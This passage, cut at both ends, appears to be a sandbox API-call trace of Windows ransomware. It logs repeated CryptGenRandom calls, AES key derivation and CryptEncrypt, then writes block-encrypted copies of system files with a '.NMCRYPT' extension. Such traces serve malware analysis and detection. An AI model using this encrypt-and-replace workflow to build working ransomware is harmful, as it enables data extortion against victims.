pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.293] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.294] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.295] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.296] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.296] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0159.296] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.296] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad1b8) returned 1 [0159.296] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.296] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.296] wcslen (_String="\\\\?\\") returned 0x4 [0159.296] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad8b8) returned 1 [0159.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.297] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.297] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.298] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.299] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.299] GetLastError () returned 0x0 [0159.299] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.300] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.300] GetLastError () returned 0x0 [0159.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.300] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.300] GetLastError () returned 0x0 [0159.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.300] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.300] GetLastError () returned 0x0 [0159.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.300] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.300] GetLastError () returned 0x0 [0159.300] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.300] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.300] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.300] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.301] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.301] GetLastError () returned 0x0 [0159.301] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.301] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, 